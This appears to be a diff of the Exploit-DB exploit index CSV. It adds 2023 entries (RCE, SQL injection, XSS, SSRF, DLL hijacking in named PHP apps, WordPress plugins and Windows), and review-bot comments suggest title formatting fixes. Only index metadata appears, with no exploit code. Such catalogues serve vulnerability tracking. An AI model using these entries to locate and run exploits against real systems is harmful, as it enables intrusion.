@ -22489,6 +22502,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11478,exploits/php/webapps/11478.txt,"Limny 2.0 - Cross-Site Request Forgery (Create Admin User)",2010-02-16,"Luis Santana",webapps,php,,2010-02-15,,0,OSVDB-62389;CVE-2010-0709,,,,,
34198,exploits/php/webapps/34198.txt,"Limny 2.1 - 'q' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",webapps,php,,2010-06-24,2014-07-29,1,,,,,,https://www.securityfocus.com/bid/41152/info
36494,exploits/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",webapps,php,,2012-01-04,2015-03-26,1,CVE-2012-5343;OSVDB-78093,,,,,https://www.securityfocus.com/bid/51261/info
51744,exploits/php/webapps/51744.txt,"Limo Booking Software v1.0 - CORS",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
38828,exploits/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",webapps,php,,2013-11-17,2015-11-30,1,OSVDB-99993,,,,,https://www.securityfocus.com/bid/63771/info
34811,exploits/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Cross-Site Scripting",2009-07-08,"599eme Man",webapps,php,,2009-07-08,2014-09-29,1,CVE-2009-2442;OSVDB-55741,,,,,https://www.securityfocus.com/bid/43711/info
10736,exploits/php/webapps/10736.txt,"lineaCMS - Cross-Site Scripting",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,,
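Review bot: "CORS" in row 51744 names a browser mechanism, not a weakness; the neighbouring rows name the actual flaw ("Cross-Site Request Forgery (Create Admin User)", "Local File Disclosure"). Suggest "Limo Booking Software 1.0 - CORS Misconfiguration", or whatever the exploit file actually demonstrates, so the class is searchable.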
@ -23149,6 +23163,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48868,exploits/php/webapps/48868.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)",2020-10-12,bzyo,webapps,php,,2020-10-12,2020-10-12,0,,,,,,
45344,exploits/php/webapps/45344.txt,"MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection",2018-09-07,"Carlos Avila",webapps,php,80,2018-09-07,2018-09-07,0,,"SQL Injection (SQLi)",,,,
3924,exploits/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php,,2007-05-13,,1,OSVDB-36239;CVE-2007-2706,,,,,
51737,exploits/php/webapps/51737.txt,"Media Library Assistant Wordpress Plugin - RCE and LFI",2023-10-09,"Florent MONTEL",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4634,,,,,
41557,exploits/php/webapps/41557.txt,"Media Search Engine Script - 'search' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
12141,exploits/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",webapps,php,,2010-04-10,,1,OSVDB-63842,,,,,
17292,exploits/php/webapps/17292.txt,"MediaInSpot CMS - Local File Inclusion (2)",2011-05-16,"wlhaan haker",webapps,php,,2011-05-16,2011-05-16,1,,,,,,
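Review bot: row 51737 is titled "Media Library Assistant Wordpress Plugin - RCE and LFI", so it sorts under "Media..." with no version and an empty tags column; the rest of the index uses "WordPress Plugin <Name> <version> - <issue>" and a "WordPress Plugin" tag (compare rows 36466 and 18988 further down), so this entry will not be found alongside the other WordPress plugin exploits. Suggest "WordPress Plugin Media Library Assistant <version> - Remote Code Execution (RCE) / Local File Inclusion" with the affected version taken from the exploit header, and populate the tags column.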
@ -24781,6 +24796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49431,exploits/php/webapps/49431.txt,"Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,,
49420,exploits/php/webapps/49420.txt,"Online Hotel Reservation System 1.0 - Admin Authentication Bypass",2021-01-13,"Richard Jones",webapps,php,,2021-01-13,2021-01-13,0,,,,,,
49430,exploits/php/webapps/49430.txt,"Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,,
51728,exploits/php/webapps/51728.txt,"Online ID Generator 1.0 - Remote Code Execution (RCE)",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
49564,exploits/php/webapps/49564.txt,"Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass",2021-02-16,"Christian Vierschilling",webapps,php,,2021-02-16,2021-02-16,0,,,,,,
47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,,2019-11-29,2019-11-29,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comonline-inventory-manager-3.2.zip,
42629,exploits/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",webapps,php,,2017-09-07,2017-09-07,0,,,,,,
@ -29378,6 +29394,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3758,exploits/php/webapps/3758.php,"ShoutPro 1.5.2 - 'shout.php' Remote Code Injection",2007-04-17,Gammarays,webapps,php,,2007-04-16,2011-04-27,1,OSVDB-34999;CVE-2007-2141,,,,http://www.exploit-db.comShoutPro1.5.2.zip,
50941,exploits/php/webapps/50941.txt,"Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Akshay Ravi",webapps,php,,2022-05-17,2022-05-24,0,CVE-2022-0967,,,,,
8679,exploits/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,webapps,php,,2009-05-13,,1,OSVDB-54503;CVE-2009-1650,,,,,
51745,exploits/php/webapps/51745.txt,"Shuttle-Booking-Software v1.0 - Multiple-SQLi",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
45773,exploits/php/webapps/45773.txt,"SiAdmin 1.1 - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80,2018-11-05,2018-11-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comSiAdmin-1.1.zip,
36482,exploits/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Cross-Site Scripting",2012-01-01,Net.Edit0r,webapps,php,,2012-01-01,2015-03-25,1,,,,,,https://www.securityfocus.com/bid/51218/info
12260,exploits/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,webapps,php,,2010-04-15,,1,OSVDB-63837;CVE-2010-1711;OSVDB-63836;CVE-2010-1710,,,,,
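Review bot: "Multiple-SQLi" in row 51745 is hyphenated shorthand; the index writes this class as "Multiple SQL Injections" (row 8679, three lines up). Suggest "Shuttle Booking Software 1.0 - Multiple SQL Injections", keeping the hyphenated repository name only if it is the product's actual name.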
@ -32151,6 +32168,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2011-10-02,0,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html
35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2014-12-10,1,,,,,,https://www.securityfocus.com/bid/47065/info
17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php,,2011-03-27,2011-03-29,1,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,
51743,exploits/php/webapps/51743.txt,"Webedition CMS v2.9.8.8 - Blind SSRF",2023-10-09,"Mirabbas Ağalarov",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,,
51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,,
14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php,,2010-06-30,2010-07-07,0,OSVDB-65930,,,,http://www.exploit-db.comwebERP_3.11.4.zip,
@ -32206,6 +32224,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,0,OSVDB-85662,,,,,
19574,exploits/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",webapps,php,,2012-07-04,2012-07-04,1,OSVDB-83688,,,,http://www.exploit-db.comWebifyLinkDirectory.zip,
21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,1,OSVDB-85662,,,,,
51736,exploits/php/webapps/51736.txt,"WEBIGniter v28.7.23 File Upload - Remote Code Execution",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
51616,exploits/php/webapps/51616.txt,"Webile v1.0.1 - Multiple Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80,2019-08-01,2019-08-02,0,,"SQL Injection (SQLi)",,,,
46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,80,2019-02-11,2019-02-12,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebiness_inventory-2.3.zip,
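Review bot: in row 51736 "File Upload" sits before the " - " separator, so the description reads as a product called "WEBIGniter v28.7.23 File Upload"; suggest "WEBIGniter v28.7.23 - Arbitrary File Upload / Remote Code Execution (RCE)" so the product and the issue are in their usual columns of the title.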
@ -33177,6 +33196,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36466,exploits/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",webapps,php,,2015-03-24,2015-03-24,0,CVE-2014-9014;CVE-2014-9013;OSVDB-115631,,,,,
36490,exploits/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",webapps,php,,2015-03-25,2016-10-27,0,CVE-2014-9014;OSVDB-115631;CVE-2014-9013,,,,,
18988,exploits/php/webapps/18988.php,"WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",webapps,php,,2012-06-05,2012-06-05,1,OSVDB-81143,"WordPress Plugin",,,http://www.exploit-db.comwpmarketplace.zip,
51735,exploits/php/webapps/51735.py,"Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation",2023-10-09,"Revan Arifio",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4278,,,,,
50752,exploits/php/webapps/50752.txt,"WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation",2022-02-18,"numan türle",webapps,php,,2022-02-18,2022-02-18,0,CVE-2022-0441,,,,,
24889,exploits/php/webapps/24889.txt,"WordPress Plugin Mathjax Latex 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",webapps,php,,2013-03-26,2013-03-26,1,OSVDB-91737,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-03-26-at-105329-am.png,,
37907,exploits/php/webapps/37907.txt,"WordPress Plugin MDC Private Message 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",webapps,php,80,2015-08-21,2015-08-21,0,CVE-2015-6805;OSVDB-126598,"WordPress Plugin",,,http://www.exploit-db.commdc-private-message.zip,
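Review bot: row 51735 uses two " - " separators and spells the product "Wordpress Plugin Masterstudy LMS", while the adjacent 50752 row spells it "WordPress Plugin MasterStudy LMS 2.7.5"; suggest "WordPress Plugin MasterStudy LMS 3.0.17 - Unauthenticated Instructor Account Creation", and add the "WordPress Plugin" tag that row 18988 in this hunk carries.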
@ -33810,6 +33830,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37406,exploits/php/webapps/37406.php,"WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",webapps,php,,2012-06-14,2015-06-28,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/54020/info
37200,exploits/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",webapps,php,80,2015-06-04,2015-06-04,0,CVE-2015-4465;OSVDB-122910;CVE-2015-4153,"WordPress Plugin",,,,
17778,exploits/php/webapps/17778.txt,"WordPress Plugin Zotpress 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",webapps,php,,2011-09-04,2011-09-04,1,,"WordPress Plugin",,,http://www.exploit-db.comzotpress.4.4.zip,
51739,exploits/php/webapps/51739.txt,"Wordpress Sonaar Music Plugin 4.7 - Stored XSS",2023-10-09,"Furkan Karaarslan",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,,2020-11-27,2020-11-27,0,,,,,,
34578,exploits/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php?File' Arbitrary File Download",2014-09-08,alieye,webapps,php,80,2014-09-08,2014-09-08,0,OSVDB-110832,,,,,
38568,exploits/php/webapps/38568.txt,"WordPress Theme Ambience - 'src' Cross-Site Scripting",2013-06-09,Darksnipper,webapps,php,,2013-06-09,2015-10-30,1,,,,,,https://www.securityfocus.com/bid/60458/info
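Review bot: row 51739, "Wordpress Sonaar Music Plugin 4.7 - Stored XSS", lower-cases the P in WordPress and places "Plugin" after the product name, so it sorts after every "WordPress Plugin" row and next to the "Wordpress Theme" entries; suggest "WordPress Plugin Sonaar Music 4.7 - Stored Cross-Site Scripting (XSS)" to match the form of the plugin rows in the previous hunk.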
@ -40772,6 +40793,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,,2019-11-19,2019-11-19,0,CVE-2019-1405;CVE-2019-1322,,,,,https://github.com/apt69/COMahawk
47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,,2020-01-13,2020-01-13,0,,,,,,
47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,,2019-07-12,2019-07-12,1,CVE-2019-1019,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1817
51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,,
40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,,
14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,,
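Review bot: row 51733 writes "DLL hijacking" in lower case where the index uses "DLL Hijacking" (row 14733 two lines down), and the "(Forced)" qualifier appears nowhere else in the visible index; either expand it to the condition the exploit header describes or drop it so the title matches the existing DLL hijacking entries.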
